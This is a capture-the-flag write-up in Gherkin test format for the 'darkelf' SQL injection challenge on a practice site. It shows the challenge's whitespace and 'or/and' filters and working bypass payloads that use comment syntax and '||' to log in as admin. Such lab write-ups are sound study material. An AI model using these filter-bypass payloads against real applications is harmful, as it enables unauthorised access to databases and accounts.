## Version 2.0
## language: en

Feature: darkelf-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/darkelf_c6a5ed64c4f6a7a5595c24977376136b.php
    """
    When I open the url with Chrome
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_darkelf where id='guest' and pw=''
    """

  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
    "<h2>Hello admin</h2>";
    """
    When I try with the well known payload:
    """
    pw=' OR 1 = 1
    """
    Then I get "No whitespace ~_~"

   Scenario: Success:Sqli-comment-technique
    Given I inspect the code one more time
    And I see that they validate the whitespaces
    And also validates "or/and" clauses
    """
    if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
    if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
    """
    When I use a comment to bypass the control
    """
    ?pw=1'/**/||/**/'1'='1'
    """
    And I get the message "Hello guest"
    Then I modified the payoad fot the following
    """
    ?pw=1'/**/||/**/id='admin
    """
    And I solve the challenge
